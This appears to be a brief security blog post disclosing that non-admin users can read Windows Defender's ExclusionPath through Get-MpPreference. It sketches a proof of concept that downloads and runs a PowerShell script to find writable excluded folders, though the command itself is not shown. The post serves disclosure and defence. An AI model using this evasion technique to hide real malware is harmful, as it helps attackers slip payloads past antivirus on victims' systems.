Dear Windows Defender, please tell me where I can drop my malicious code. Simone Aonzo Follow Mar 24 · 2 min read

The Get-MpPreference cmdlet exposes the field ExclusionPath without administrator privilege.

What is the matter? An attacker can easily inspect if and which folders are not scanned by Windows Defender.

For example, they can inspect this field, looking for a folder in which they can write and drop the next stage of their malware without being noticed.

Do you want a POC? Here we go.

Exclude a folder from Windows Defender Security scan settings. Open a Command Prompt from any user session (obviously not as administrator). Run the following command; it downloads and executes a PS script:

The PowerShell script “ExploitDefenderExclusionPOC.ps1” gets the ExclusionPath and tries to drop the EICAR Testfile. Thus, if it finds a folder where it can write, it is able to write a malicious payload without being noticed by the Windows Defender.